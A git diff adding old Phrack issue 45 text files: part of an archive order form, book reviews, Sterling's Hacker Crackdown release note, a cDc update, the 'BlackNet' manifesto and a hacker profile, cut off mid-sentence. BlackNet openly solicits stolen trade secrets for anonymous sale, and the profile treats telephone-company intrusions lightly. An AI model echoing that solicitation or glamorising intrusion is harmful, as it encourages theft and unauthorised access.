+                pages on a topic based on computer culture (ie, hacking
+                culture, virus writing culture, Internet culture, etc.) For
+                more details write: SotMESC  PO BOX 573  Long Beach, MS 39560
+                or email: rejones@seabass.st.usm.edu
+
+    NOTE: THE FIRST DONATIONS TO EACH OF THE ABOVE TWO CAUSES HAVE ALREADY
+          BEEN MADE.
+
+What Each "Message Base File" Contains:
+---------------------------------------
+
+     - A two page general message explaining H/P BBS terminology and format.
+
+     - The BBS Pro-Phile:  A historical background and description of the BBS
+       either written by the original system operator(s) or those who actually
+       called the BBS when it was in operation (it took months to track the
+       appropriate people down and get them to write these specifically for
+       this project; lesser known BBSes may not contain a Pro-Phile);
+
+     - Messages posted to the BBS (i.e. the Message Base);
+
+     - Downloaded Userlists if available; and
+
+     - Hacking tutorials a.k.a. "G-Philes" that were on-line if available.
+
+   It is anticipated that most people who are interested in the message bases
+have never heard of a lot of the BBS names shown in the listing.  If you have
+seen one set of messages, you have NOT seen them ALL.  Each system had a
+unique personality, set of users, and each has something different to offer.
+
+
+Formats the Message Base Files are Available in:
+------------------------------------------------
+
+   Due to the large size of the Message Base Files, they will be compressed
+using the format of your choice.  Please note that Lodcom does NOT include the
+compression/uncompression program (PKZIP, PAK, MAC Stuffit, etc.).  ASCII
+(uncompressed) files will be provided for $5.00 extra to cover additional
+diskette (files that are uncompressed require more than double the number of
+diskettes) and shipping costs.  The files are available for:
+
+     - IBM (5.25 or 3.5 inch)
+     - APPLE MACINTOSH (3.5 inch)
+     - ATARI ST (MS-DOS Compatible 3.5 inch)
+     - AMIGA (3.5 inch)
+     - PAPER versions can be ordered but cost triple (due to increased costs
+       to ship, time to print, and messages being in 40 column format which
+       wastes lots of paper...save those trees!).  Paper versions take twice
+       the time to deliver but are laser printed.
+
+Orders are expected to arrive at the requesters' physical mail box in 3-5
+weeks upon receipt of the order.
+
+
+The Collection:
+---------------
+
+   This is where we currently stand as far as what has been completed and the
+estimated completion dates for the rest of the project:
+
+                       Volume 1: 5700+ Messages, 20 H/P BBSes, COMPLETED.
+                       Volume 2: 2100+ Messages, 25 H/P BBSes, COMPLETED.
+                       Volume 3: 20-30 H/P BBSes, End of March 1994.
+                       Volume 4: ????? H/P BBSes, Sometime after 3/94.
+                       All in all there is expected to be 12000+ Messages.
+
+       NOTE: Additional material has recently been received for Boards already
+released in the first 2 volumes. Those who have already ordered will receive
+the updated versions with the additional messages that have been recovered.
+
+
+*** Blurbs and Excerpts: ***
+----------------------------
+
+    Blurbs from some of those who have received the first two Volumes:
+
+   "I am stunned at the quality of this undertaking. It brought back that
+    feeling of involvement and interest." --P.P.
+
+   "I think of the release of the H/P Message Bases as an opening salvo in
+    the battle for the truth about fraud in the Telecom Industry." --J.J.
+
+   "Still sifting through Volume one. For now I've taken the approach of
+    putting all the files into one subdirectory and searching it for topics
+    of interest. Prime and Primos computers was my first topic of interest
+    and Volume I yielded quite a bit of odd and useful information." --K.B.
+
+   "...the professionalism of the Message Bases is of a superior quality.
+    Somehow they bring back that age of innocence. Boy do I miss those
+    times." --A.C.
+
+   Excerpt from 2600 Magazine (The Hacker Quarterly) Autumn 1993 Issue,
+review by Emmanuel Goldstein entitled NEVER ERASE THE PAST.
+
+    "...is this the sort of thing that people really care about? Undoubtedly,
+many will shrug it off as useless, boring teenagers that have absolutely no
+relevance to anything in the real world. The fact remains, however, that this
+is history. This is *our* history, or at least, a small part of it. The boards
+included in this project - Sherwood Forest I & II, Metal Shop Private, OSUNY,
+Phoenix Project, and a host of others - are among the more interesting hacker
+boards, with some classic dialogue and a gang of hacker stars-to-be. Nearly
+all of these boards were raided at one time or another, which makes it all
+even more fascinating."
+
+    "Had the LODCOM project not come along when it did, a great many of these
+message bases probably would have been lost forever. Providing this service
+to both the hacker community and those interested in it is a noble cause that
+is well worth the price. If it succeeds, some valuable hacker data will be
+preserved for future generations."
+
+    The Lodcom project was also reviewed in Computer underground Digest Issue
+#5.39 and will be reviewed by GRAY AREAS MAGAZINE in their summer issue. You
+should be able to find the issue on most newsstands in about 3 months. You can
+contact Gray Areas by phone: 215-353-8238 (A machine screens their calls), by
+email: grayarea@well.sf.ca.us, and by regular mail: Gray Areas, Inc. , PO BOX
+808, Broomall, PA 19008-0808. Subscriptions are $18.00 a year U.S. and we
+highly recommend the magazine if you are interested in the gray areas of life.
+
+*** {End of Blurbs and Excerpts} ***
+
+
+Volume 1 & 2 Table of Contents:
+-------------------------------
+
+     A detailed Table of Contents file can be found on the Mindvox Gopher
+Server or requested via email.
+
+
+Project Contributor List:
+-------------------------
+
+   The following is a list (order is random) of those who helped with this
+effort that began in Jan. of 1993. Whether they donated material, uploaded
+messages, typed messages from printouts, critiqued our various materials,
+wrote BBS Pro-Philes, donated services or equipment, or merely 'looked in
+their attic for some old disks', their help is appreciated:
+
+Lord Digital and Dead Lord (Phantom Access Technologies/The MINDVOX System),
+2600 Magazine/Emmanuel Goldstein, The Marauder, Knight Lightning, T.B.,
+Computer underground Digest (CuD)/Jim Thomas/Gordon Meyer, Phrack Magazine,
+Strat, Jester Sluggo, Erik Bloodaxe, Taran King, Professor Falken, TUC,
+Lex Luthor, Mark Tabas, Phantom Phreaker, Quasi Moto, The Mechanic, Al Capone,
+Compu-Phreak, Dr. Nibblemaster, King Blotto, Randy Hoops, Sir Francis Drake,
+Digital Logic, The Ronz, Doctor Who, The Jinx, Boca Bandit, Crimson Death,
+Doc Holiday, The Butler, Ninja Master, Silver Spy, Power Spike, Karl Marx,
+Blue Archer, Dean Simmons, Control-C, Bad Subscript, Swamp Ratte, Randy Smith,
+Terminal Man, SK Erickson, Slave Driver, R.E.Jones/CSP/SotMESC, Gray Areas
+Magazine, and anonymous others.
+
+
+The Order Form:
+---------------
+
+- - - - - - - - - - - - - - - C U T - H E R E - - - - - - - - - - - - - - - -
+
+               LOD Communications H/P BBS Message Base ORDER FORM
+               ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+   PERSONAL RATE:  Volumes 1, 2, 3, and possibly a fourth if created: $39.00
+   This price is TOTAL & includes any updates to individual BBS Message Bases.
+
+   COMMERCIAL RATE:  Corporations, Universities, Libraries, and Government
+   Agencies: $99.00  As above, price is total and includes updates.
+
+H/P BBS Message Bases (All Volumes): $________
+
+"G-Phile" Collection (Optional): $____________ ($10.00 Personal)
+                                               ($25.00 Commercial)
+
+Disk Format/Type of Computer: _____________________________________
+(Please be sure to specify diskette size [5.25" or 3.5"] and high/low density)
+
+File Archive Method (.ZIP [preferred], .ARJ, .LHZ, .Z, .TAR) ____________
+                    (ASCII [Non-Compressed] add $5.00 to order)
+
+Texas Residents add 8% Sales Tax.
+If outside North America please add $6.00 for Shipping & Handling.
+
+Total Amount (In U.S. Dollars): $ ___________
+
+Payment Method:  Check or Money Order please, made out to LOD Communications.
+Absolutely NO Credit Cards, even if it's yours :-)
+
+By purchasing these works, the Purchaser agrees to abide by all applicable U.S.
+Copyright Laws to not distribute or reproduce, electronically or otherwise, in
+part or in whole, any part of the Work(s) without express written permission
+from LOD Communications.
+
+Send To:
+          Name: _____________________________________
+
+  Organization: _____________________________________ (If applicable)
+
+        Street: _____________________________________
+
+City/State/Zip: _____________________________________
+
+       Country: _____________________________________
+
+E-mail address: _____________________________________ (If applicable)
+
+
+PRIVACY NOTICE:  The information provided to LOD Communications is used for
+sending orders and periodic updates to the H/P BBS Message Base Price List.
+It will NOT be given or sold to any other party.  Period.
+
+
+- - - - - - - - - - - - - - - C U T - H E R E - - - - - - - - - - - - - - - -
+
+Remit To:   LOD Communications
+            603 W. 13th
+            Suite 1A-278
+            Austin, Texas USA  78701
+
+Lodcom can also be contacted via E-mail:  lodcom@mindvox.phantom.com
+                             Voice Mail:  512-448-5098
+ _____________________________________________________________________________
+ End Brief Version of Order/Info File (2/20/94)
+
+
+Email: lodcom@mindvox.phantom.com
+Voice Mail: 512-448-5098
+Snail Mail: LOD Communications
+            603 W. 13th  Suite 1A-278
+            Austin, Texas USA 78701
+
+------------------------------------------------------------------------------
+
+
+
+                           BooX for Hackers
+                           ================
+
+by Seven Up
+
+Usually I am not reading too many books. But there are two rather new
+ones everyone should read and have.
+
+UNIX Power Tools
+================
+
+The first one is made for people who like to play with UNIX.
+It is called 'UNIX Power Tools', published by Bantam and O'Reilly. It
+contains over 1000 pages and weighs about 3 pounds, but contains a CD
+ROM. It contains pretty useful information and examples on how to use
+standard UNIX utilities and how to solve certain tasks. Some of the topics
+it covers are:
+Encryption of passwords, shell programming, config files for logging in
+and out, setting shell prompts, vi tips & tricks, redirecting and piping,
+sed & awk and much more. Like most O'Reilly books, it is written with
+a lot of humor and easy to read. To me, this book is a reference for almost
+any question. You might even feel that you don't need most of your old
+UNIX books anymore, because this book almost covers it all. It is also a lot
+of fun just to browse through the book randomly and read articles on
+different subjects. There really is no need and no use to read it from A to Z.
+A lot of their tricks is collected from Usenet Newsgroups. All of their use-
+ful programs, scripts and general PD programs you will find on FTP sites
+are on the CD. However, if you want a different medium they charge you $40.
+And now we come to the only problem of the book: the price! I think compared
+to the contents, charging $59.95 is justified; but it might scare off many
+people anyway. Finally I would recommend this book to everyone who uses
+UNIX a lot and likes to experiment and play with it (and has 60 bucks left).
+
+
+Hacker Crackdown
+================
+
+Now reading Bruce's book won't cost you 60 bucks. In fact, it will even
+be totally FREE! I won't say too much about the book, because there have
+already been great reviews in Phrack and 2600 in Spring/Summer 1993. It
+is probably the most interesting and entertaining book about Hackers and
+Fedz from 1993. But now Bruce decided to release the book as online
+freeware - you may just grab the 270k file from a site, read it and give
+it to anyone you want.
+
+But let's listen to Bruce now and what he has to say...
+
+
+January 1, 1994 -- Austin, Texas
+
+     Hi, I'm Bruce Sterling, the author of this
+electronic book.
+
+     Out in the traditional world of print, *The
+Hacker Crackdown* is ISBN 0-553-08058-X, and is
+formally catalogued by the Library of Congress as "1.
+Computer crimes -- United States.  2. Telephone --
+United States -- Corrupt practices.  3.  Programming
+(Electronic computers) -- United States -- Corrupt
+practices."  'Corrupt practices,' I always get a kick out
+of that description.  Librarians are very ingenious
+people.
+
+     The paperback is ISBN 0-553-56370-X.  If you go
+and buy a print version of *The Hacker Crackdown,*
+an action I encourage heartily, you may notice that
+in the front of the book,  beneath the copyright
+notice  -- "Copyright (C) 1992 by Bruce Sterling" -- it
+has this little block of printed legal boilerplate from
+the publisher.  It says, and I quote:
+
+     "No part of this book may be reproduced or
+transmitted in any form or by any means, electronic
+or mechanical, including photocopying, recording,
+or by any information storage and retrieval system,
+without permission in writing from the publisher.
+For information address:  Bantam Books."
+
+     This is a pretty good disclaimer, as such
+disclaimers go.  I collect intellectual-property
+disclaimers, and I've seen dozens of them, and this
+one is at least pretty straightforward.  In this narrow
+and particular case, however, it isn't quite accurate.
+Bantam Books puts that disclaimer on every book
+they publish, but Bantam Books does not, in fact,
+own the electronic rights to this book.  I do, because
+of certain extensive contract maneuvering my
+agent and I went through before this book was
+written.  I want to give those electronic publishing
+rights away through certain not-for-profit channels,
+and I've convinced Bantam that this is a good idea.
+
+     Since Bantam has seen fit to peaceably agree to
+this scheme of mine, Bantam Books is not going to
+fuss about this.  Provided you don't try to sell the
+book, they are not going to bother you for what you
+do with the electronic copy of this book. If you want
+to check this out personally, you can ask them;
+they're at 1540 Broadway NY NY 10036.  However, if
+you were so foolish as to print this book and start
+retailing it for money in violation of my copyright
+and the commercial interests of Bantam Books,
+then Bantam, a part of the gigantic Bertelsmann
+multinational publishing combine, would roust
+some of their heavy-duty attorneys out of
+hibernation and crush you like a bug.  This is only to
+be expected.  I didn't write this book so that you
+could make money out of it.  If anybody is gonna
+make money out of this book, it's gonna be me and
+my publisher.
+
+     My publisher deserves to make money out of
+this book.  Not only did the folks at Bantam Books
+commission me to write the book, and pay me a
+hefty sum to do so, but they bravely printed, in text,
+an electronic document the reproduction of which
+was once alleged to be a federal felony.  Bantam
+Books and their numerous attorneys were very
+brave and forthright about this book.  Furthermore,
+my former editor at Bantam Books, Betsy Mitchell,
+genuinely cared about this project, and worked hard
+on it, and had a lot of wise things to say about the
+manuscript.  Betsy deserves genuine credit for this
+book, credit that editors too rarely get.
+
+     The critics were very kind to *The Hacker
+Crackdown,* and commercially the book has done
+well.  On the other hand, I didn't write this book in
+order to squeeze every last nickel and dime out of
+the mitts of impoverished sixteen-year-old
+cyberpunk high-school-students.  Teenagers don't
+have any money -- (no, not even enough for the  six-
+dollar *Hacker Crackdown* paperback, with its
+attractive bright-red cover and useful index).   That's
+a major reason why teenagers sometimes succumb
+to the temptation to do things they shouldn't, such
+as swiping my books out of libraries.   Kids:  this one
+is all yours, all right?  Go give the print version back.
+*8-)
+
+     Well-meaning, public-spirited civil libertarians
+don't have much money, either.   And it seems
+almost criminal to snatch cash out of the hands of
+America's direly underpaid electronic law
+enforcement community.
+
+     If you're a computer cop, a hacker, or an
+electronic civil liberties activist, you are the target
+audience for this book.  I wrote this book because I
+wanted to help you, and help other people
+understand you and your unique, uhm, problems.  I
+wrote this book to aid your activities, and to
+contribute to the public discussion of important
+political issues.  In giving the text away in this
+fashion, I am directly contributing to the book's
+ultimate aim:  to help civilize cyberspace.
+
+     Information *wants* to be free.  And  the
+information inside this book longs for freedom with
+a peculiar intensity.  I genuinely believe that the
+natural habitat of this book is inside an electronic
+network.  That may not be the easiest direct method
+to generate revenue for the book's author, but that
+doesn't matter; this is where this book belongs by its
+nature.  I've written other books -- plenty of other
+books -- and I'll write more and I am writing more,
+but this one is special.  I am making *The Hacker
+Crackdown* available electronically as widely as I
+can conveniently manage, and if you like the book,
+and think it is useful, then I urge you to do the same
+with it.
+
+     You can copy this electronic book.   Copy the
+heck out of it, be my guest, and give those copies to
+anybody who wants them.  The nascent world of
+cyberspace is full of sysadmins, teachers, trainers,
+cybrarians, netgurus, and various species of
+cybernetic activist.  If you're one of those people,  I
+know about you, and I know the hassle you go
+through to try to help people learn about the
+electronic frontier.  I hope that possessing this book
+in electronic form will lessen your troubles.  Granted,
+this treatment of our electronic social spectrum is
+not the ultimate in academic rigor.  And politically, it
+has something to offend and trouble almost
+everyone.   But hey, I'm told it's readable, and at
+least the price is right.
+
+     You can upload the book onto bulletin board
+systems, or Internet nodes, or electronic discussion
+groups.  Go right ahead and do that, I am giving you
+express permission right now.  Enjoy yourself.
+
+     You can put the book on disks and give the disks
+away, as long as you don't take any money for it.
+
+     But this book is not public domain.  You can't
+copyright it in your own name.   I own the copyright.
+Attempts to pirate this book and make money from
+selling it may involve you in a serious litigative snarl.
+Believe me, for the pittance you might wring out of
+such an action, it's really not worth it.  This book
+don't "belong" to you.  In an odd but very genuine
+way, I feel it doesn't "belong" to me, either.  It's a
+book about the people of cyberspace, and
+distributing it in this way is the best way I know to
+actually make this information available, freely and
+easily, to all the people of cyberspace -- including
+people far outside the borders of the United States,
+who otherwise may never have a chance to see any
+edition of the book, and who may perhaps learn
+something useful from this strange story of distant,
+obscure, but portentous events in so-called
+"American cyberspace."
+
+      This electronic book is now literary freeware.  It
+now belongs to the emergent realm of alternative
+information economics.  You have no right to make
+this electronic book part of the conventional flow of
+commerce.  Let it be part of the flow of knowledge:
+there's a difference.   I've divided the book into four
+sections, so that it is less ungainly for upload and
+download; if there's a section of particular relevance
+to you and your colleagues, feel free to reproduce
+that one and skip the rest.
+
+     Just make more when you need them, and give
+them to whoever might want them.
+
+     Now have fun.
+
+     Bruce Sterling -- bruces@well.sf.ca.us
+
+------------------------------------------------------------------------------
+  _   _
+ ((___))
+ [ x x ] cDc communications
+  \   /  Global Domination Update #14
+  (' ')  December 30th, 1993
+   (U)
+Est. 1986
+
+New gNu NEW gnU new GnU nEW gNu neW gnu nEw GNU releases for December, 1993:
+
+ _________________________________/Text Files\_________________________________
+
+241: "Cell-Hell" by Video Vindicator.  In-depth article on modifying the
+Mitsubishi 800 cellular phone by Mr. Fraud himself.  Rad.
+
+242: "The Darkroom" by Mark Vaxlov.  Very dark story about a high school rape
+in the photography lab at school.  Disturbing.
+
+243: "Fortune Smiles" by Obscure Images.  Story set in the future with
+organized crime and identity-swapping.
+
+244: "Radiocarbon Dating Service" by Markian Gooley.  Who would go out with
+Gooley?  YOUR MOM!
+
+245: "The U.S. Mercenary Army" by Phil Agee.  Forwarded by The Deth Vegetable,
+this file contains a speech by former CIA agent Agee on the Gulf War.
+Interesting stuff.
+
+246: "The Monolith" by Daniel S. Reinker.  This is one of the most disgusting
+files we've put out since the infamous "Bunny Lust."  I don't wanna describe
+this, just read it.
+
+247: "Post-Election '92 Cult Coverage" by Omega.  Afterthoughts on Tequila
+Willy's bid for the U.S. Presidency.
+
+248: "The Lunatic Crown" by Matthew Legare.  Wear the crown.  Buy a Slurpee.
+Seek the adept.  Do not pass 'Go.'
+
+249: "Yet Another Suicide" by The Mad Hatter.  Guy gets depressed over a girl
+and kills himself.
+
+250: "State of Seige" by Curtis Yarvin.  The soldiers hunt the dogs hunt the
+soldiers.  Like, war, ya know.  Hell!
+
+ __________________________________/cDc Gnuz\__________________________________
+
+                           "cDc: We're Into Barbie!"
+
+cDc mailing list: Get on the ever-dope and slamagnifiterrific cDc mailing list!
+Send mail to cDc@cypher.com and include some wonderlessly elite message along
+he lines of "ADD ME 2 DA MAILIN LIZT!!@&!"
+
+NEW Official cDc Global Domination Factory Direct Outlets:
+The Land of Rape and Honey     502/491-6562
+Desperadoes                    +61-7-3683567
+Underworld                     203/649-6103
+Airstrip-One                   512/371-7971
+Ministry of Death              516/878-1774
+Future Shock                   +61-7-3660740
+Murder, Inc                    404/416-6638
+The Prodigal Sun               312/238-3585
+Red Dawn-2 Enterprises         410/263-2258
+Cyber Neurotic Reality Test    613/723-4743
+Terminal Sabotage              314/878-7909
+The Wall                       707/874-1316,2970
+
+We're always taking t-file submissions, so if you've got a file and want to
+really get it out there, there's no better way than with cDc.  Upload text to
+The Polka AE, to sratte@phantom.com, or send disks or hardcopy to the cDc post
+office box in Lubbock, TX.
+
+cDc has been named SASSY magazine's "Sassiest Underground Computer Group."
+Hell yeah!
+
+Thanks to Drunkfux for setting up another fun HoHoCon this year, in Austin.  It
+was cool as usual to hang out with everyone who showed up.
+
+Music credits for stuff listened to while editing this batch of files: Zapp,
+Carpenters, Deicide, and Swingset Disaster.
+
+Only text editor worth a damn: ProTERM, on the Apple II.
+
+So here's the new cDc release.  It's been a while since the last one.  It's out
+because I fucking felt like it, and have to prove to myself that I can do this
+crap without losing my mind and having to go stand in a cotton field and look
+at some dirt at 3 in the morning.  cDc=cDc+1, yeah yeah.  Do you know what this
+is about?  Any idea?  This is SICK and shouldn't be harped on or celebrated.
+This whole cyberdweeb/telecom/'puter underground scene makes me wanna puke,
+it's all sick and dysfunctional.  Eat my shit, G33/<W0r|_<|.  Virus yourself to
+death.  Go blind staring at the screen waiting for more wares/inph0 to come
+trickling down the wire.  The more of that shit comes in, the more life goes
+out.  Ooh, and you hate it so much, don't you.  You hate it.
+
+Hacking's mostly a big waste of time.  Fuck you.
+Stupid Telephone Tricks will never be on David Letterman.  Fuck you.
+Cryptography?  Who'd wanna read YOUR boring email?  Fuck you.
+Interactive television is a couch potato trap.  Fuck you.
+"Surf the net," sucker.  "Ride the edge," you maladjusted sack of shit.
+
+S. Ratte'
+cDc/Editor and P|-|Ear13zz |_3@DeRrr
+"We're into t-files for the groupies and money."
+Fuck you, fuck you... and most of all, fuck YOU.
+
+Write to: cDc communications, P.O. Box 53011, Lubbock, TX  79453.
+Internet: sratte@phantom.com.
+ _____________________________________________________________________________
+
+  cDc Global Domination Update #14-by Swamp Ratte'-"Hyperbole is our business"
+
+
+ALL NEW cDc RELEASES FTP'ABLE FROM FTP.EFF.ORG -pub/Publications/CuD/CDC
+
+------------------------------------------------------------------------------
+
+Introduction to BlackNet
+
+
+Your name has come to our attention. We have reason to believe you may
+be interested in the products and services our new organization,
+BlackNet, has to offer.
+
+BlackNet is in the business of buying, selling, trading, and otherwise
+dealing with *information* in all its many forms.
+
+We buy and sell information using public key cryptosystems with
+essentially perfect security for our customers. Unless you tell us who
+you are (please don't!) or inadvertently reveal information which
+provides clues, we have no way of identifying you, nor you us.
+
+Our location in physical space is unimportant. Our location in
+cyberspace is all that matters. Our primary address is the PGP key
+location: "BlackNet<nowhere@cyberspace.nil>" and we can be contacted
+(preferably through a chain of anonymous remailers) by encrypting a
+message to our public key (contained below) and depositing this
+message in one of the several locations in cyberspace we monitor.
+Currently, we monitor the following locations: alt.extropians,
+alt.fan.david-sternlight, and the "Cypherpunks" mailing list.
+
+BlackNet is nominally nondideological, but considers nation-states,
+export laws, patent laws, national security considerations and the
+like to be relics of the pre-cyberspace era. Export and patent laws
+are often used to explicity project national power and imperialist,
+colonialist state fascism. BlackNet believes it is solely the
+responsibility of a secret holder to keep that secret--not the
+responsibility of the State, or of us, or of anyone else who may come
+into possession of that secret. If a secret's worth having, it's worth
+protecting.
+
+BlackNet is currently building its information inventory. We are
+interested in information in the following areas, though any other
+juicy stuff is always welcome. "If you think it's valuable, offer it
+to us first."
+
+- - trade secrets, processes, production methods (esp. in
+semiconductors) - nanotechnology and related techniques (esp. the
+Merkle sleeve bearing) - chemical manufacturing and rational drug
+design (esp. fullerines and protein folding) - new product plans, from
+children's toys to cruise missiles (anything on "3DO"?)  - business
+intelligence, mergers, buyouts, rumors
+
+BlackNet can make anonymous deposits to the bank account of your
+choice, where local banking laws permit, can mail cash directly (you
+assume the risk of theft or seizure), or can credit you in
+"CryptoCredits," the internal currency of BlackNet (which you then
+might use to buy _other_ information and have it encrypted to your
+special public key and posted in public place).
+
+If you are interested, do NOT attempt to contact us directly (you'll
+be wasting your time), and do NOT post anything that contains your
+name, your e-mail address, etc. Rather, compose your message, encrypt
+it with the public key of BlackNet (included below), and use an
+anonymous remailer chain of one or more links to post this encrypted,
+anonymized message in one of the locations listed (more will be added
+later). Be sure to describe what you are selling, what value you think
+it has, your payment terms, and, of course, a special public key (NOT
+the one you use in your ordinary business, of course!) that we can use
+to get back in touch with you. Then watch the same public spaces for a
+reply.
+
+(With these remailers, local PGP encryption within the remailers, the
+use of special public keys, and the public postings of the encrypted
+messages, a secure, two-way, untraceable, and fully anonymous channel
+has been opened between the customer and BlackNet. This is the key to
+BlackNet.)
+
+A more complete tutorial on using BlackNet will soon appear, in
+plaintext form, in certain locations in cyberspace.
+
+Join us in this revolutionary--and profitable--venture.
+
+
+BlackNet<nowhere@cyberspace.nil>
+
+-----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.3
+
+mQCPAixusCEAAAEEAJ4/hpAPevOuFDXWJ0joh/y6zAwklEPige7N9WQMYSaWrmbi
+XJ0/MQXCABNXOj9sR3GOlSF8JLOPInKWbo4iHunNnUczU7pQUKnmuVpkY014M5Cl
+DPnzkKPk2mlSDOqRanJZCkyBe2jjHXQMhasUngReGxNDMjW1IBzuUFqioZRpABEB
+AAG0IEJsYWNrTmV0PG5vd2hlcmVAY3liZXJzcGFjZS5uaWw+
+=Vmmy
+-----END PGP PUBLIC KEY BLOCK-----
diff --git a/phrack45/7.txt b/phrack45/7.txt
new file mode 100644
index 0000000..5b0775b
--- /dev/null
+++ b/phrack45/7.txt
@@ -0,0 +1,471 @@
+                              ==Phrack Magazine==
+
+                 Volume Five, Issue Forty-Five, File 7 of 28
+
+****************************************************************************
+
+
+                            -:[ Phrack Pro-Phile ]:-
+
+This issue our prophile introduces you to one of the all-around coolest
+people ever to show up in the computer underground.  Someone I'm happy
+to have had the good fortune to meet and force to ingest excessive quantities
+of intoxicating liquids and other unmentionables.  Someone who very
+recently showed up on tabloid television amazingly for something other than
+computer hacking.  Someone we know as:
+
+                                   Control C
+                                   ~~~~~~~~~
+_______________________________________________________________________________
+
+Personal Info:
+
+                Handle  :  Control C
+                Call Me :  A Cab
+                   DOB  :  1969
+                   AGE  :  I Would Hope You Can Figure It Out..
+                Height  :  6'0"
+                Weight  :  160
+Groups Affiliated With  :  Legion of Doom/Hackers!
+    Other Past Handles  :  Phase Jitter, Master of Impact, Dual Capstan,
+                           Richo Sloppy, Cosmos Dumpster Driver, Poster Boy,
+                           Whacky Wally (Sysop Whacky Wally's Wonderful World
+                           of Warez, as some of you may remember..  It Was a
+                           Hack/Phreak Board)
+
+
+Computers Owned:
+
+1st Computer-Texas Instruments T-1000
+-------------------------------------
+Once I expanded the memory (4K plug in Module, for a total of
+8k), I was unstoppable in BASIC.
+
+Commodore Vic-20
+----------------
+What can you say about a Vic-20?
+
+Commodore 64
+------------
+Now I was big time.  1541 Disk drive was an unbelievable upgrade
+from my Vic-20 and T-1000 mass storage devices (Cassette
+Recorder).
+
+Apple //C
+---------
+I was now a \/\/Arez d00d.  What else could you be if you had an
+Apple?  Everyone was!
+
+IBM XT
+------
+This was a real step up from CP/M (hahaha).  I had incredible CGA
+Graphics. Actually it was not a bad system.  My dad got a modem
+with it.  Bad mistake eh?  I was flying at 300 baud.  This is the
+system all my BBSes were run on.
+
+AT&T 3B1
+--------
+Lame, Lame, Lame...  That about covers it.
+
+Commodore AMIGA 500
+--------------------
+A real computer at last.  Real graphics.  Real Sound.  Real
+Multi-Tasking. A Real Operating System.  And again...I was a
+\/\/ArEz D00D.  But this time I was running 14.4K Baud. If you
+want a real computer BUY AMIGA!!!
+
+
+IBM 486DX2/66
+-------------
+Desk Top Video is really cool.  But when you put you computers in
+the car people steal them and AAA Insurance gives you a hard
+time.  Still fighting with them.
+
+Commodore AMIGA 3000
+--------------------
+I'm a \/\/arez Dood.  And the KING of Desk Top Video.  BUT don't
+put all your computers in the same car.  Oops...
+
+Commodore AMIGA 500
+-------------------
+Now I'm back to a 500 Until I get my Insurance company to pay me.
+
+----------------------------------------------------------------------
+
+General Questions:
+
+Q: How did you get your Handle?
+
+A: If you cant figure this out...you should not be reading this.
+
+Q: How did you get started?
+
+A: Dad bought me an IBM XT with a 300 Baud Modem.  I saw War
+   Games...and off I went.
+
+Q: What are some of your other interests?
+
+A: Women... Women... Women... Everybody knows about my high
+   level of hormonal activity.  Also, Cars.  If you don't have a
+   Mitusubishi 3000GT:  U R Lame.  If you have a Stealth, I bet you
+   wish you bought a 3000GT--after you have dealt with the FUCKING
+   ASSHOLES at the Chrysler DealerShit.   Everybody says buy
+   American.  Well, you buy a FUCKING brand new American car and it
+   brakes down 32 times.  The Chrysler dealer treats you like shit.
+   The manufacturer treats you like shit.  And your car runs like
+   shit.  The problem is that the American auto workers have
+   absolutely no pride in their workmanship; and the manufacturers
+   and dealers don't give a shit about you or your car after they
+   have made the sale.  Then they wonder why their sales are down
+   and people are buying foreign cars.  Well, if I go into the
+   Mitusubishi Dealership they treat me like a king and I bought the
+   car 6 months ago.  If your gonna by a car, don't buy a Chrysler.
+   They Suck!  I bought a brand new Jeep.  It broke down 32 Times.
+   Chrysler treated me like shit.  Maybe you could tell.
+
+Q: What were some of your most memorable experiences?
+
+A: The First SummerCon.  Disk Jockey and LOKI came to my house
+   the day before.  This is the first time we had met.  On the way
+   to my house they got lost and came across a street called
+   'Summerton.'  So at about 0200 in the morning we were on the corner
+   of Summerton Street and all the sudden the Summerton sign fell of
+   the post and landed in the car owned by Disk Jockey.  Well we
+   changed the T to a C and all the suddenly we had a SummerCon
+   street sign.
+
+   The trip down was a story in it self,  as many of you have
+   heard. It was really neat to meet all the people from the
+   boards.  I met Bill From RNOC who was my mentor and idol, but doesn't
+   call me anymore.. (Thanks Bill).  Lex Luthor who is one of the
+   funniest guys, we will get into this later.  Taran King, Knight
+   Lightning (Scoop!), Lucifer 666...it was ELITE!
+
+   SummerCon 87' -  This is when I got it LOD/H.  I remember sitting
+   at the pool with Mentor being really drunk and both of us going
+   "WOW!!! We're in LOD!"
+
+   My Bust -  In 1987 I was going to school in Chicago.  I was on an
+   Michigan Bell UNIX sharpening up my C programming skills, which,
+   buy the way still need sharpening.  I was on the system for 4+
+   hours.  Well the system administrator had noticed me and called
+   MBT security.  They traced the call back to Chicago.  The strange
+   part of this was that the next morning I was quitting school and
+   moving back to Detroit.  When I got home to Detroit their was a
+   message from MBT Security to call them or they would "Call On
+   Me!".  Well I thought it would be in my best interest to give
+   them a ring.   We met for lunch.
+
+   At lunch they told me since I had been in their systems for years
+   and not destroyed or changed anything...in fact they had never
+   noticed me there...They  would not press charges if I helped them
+   secure there systems.  I said "Ok!".
+
+   The next thing I know I have an office.  k-Rad elite computer.
+   Craft Access terminals.  Manuals for every phone company computer
+   on the planet and they are paying me $30,000 a year to do what I
+   love.  I was a professional Computer Hacker.  I broke into
+   Michigan Bell computers, networks, switches, went trashing
+   etc...while being paid.  It was great.  I would see what I could
+   do once I was into their systems, then write a report on what
+   needed to be changed or fixed.  I was great for them, and me.
+
+   Then I get fired - my boss at Michigan Bell loves me!  Her boss
+   loves me!  The Vice President of Michigan Bell loves me!  Then
+   Michigan Bell has a retirement incentive. The Vice President and
+   my bosses boss retire.  The New manager of computer security is
+   closed-minded, and fires me because I am "A criminal".
+
+   Well, those guys at corporate security at Michigan Bell are
+   totally out of touch. Their knowledge of computer security
+   is...how shall I say it..."lacking," I think, covers it.  In
+   fact, the code for the front door at the Michigan Bell Corporate
+   Security Building is the equivalent to leaving the code on your
+   luggage 000 and wondering how the airport baggage guy figure out
+   your code and stole all your stuff.   They should have kept
+   me on like the old guys wanted to do.
+
+   It is my understanding,  and I don't know because I don't do
+   ANYTHING ILLEGAL (like the disclaimer?), but I hear that a lot of
+   hackers are in Michigan Bell Systems.  Michigan Bell Security is
+   probably convinced that their systems are airtight.  If you guys
+   at Michigan Bell are reading this,  You need help..  Look through
+   some of my old reports and implement some of that stuff.
+
+----------------------------------------------------------------------
+
+Some BBS's To Mention:
+
+Planet 10/Librarians of Doom - (810)683-9722.  I'm Co-Sysop.  It
+is the only BBS I call. All the Old LOD Guys are on it.  It's
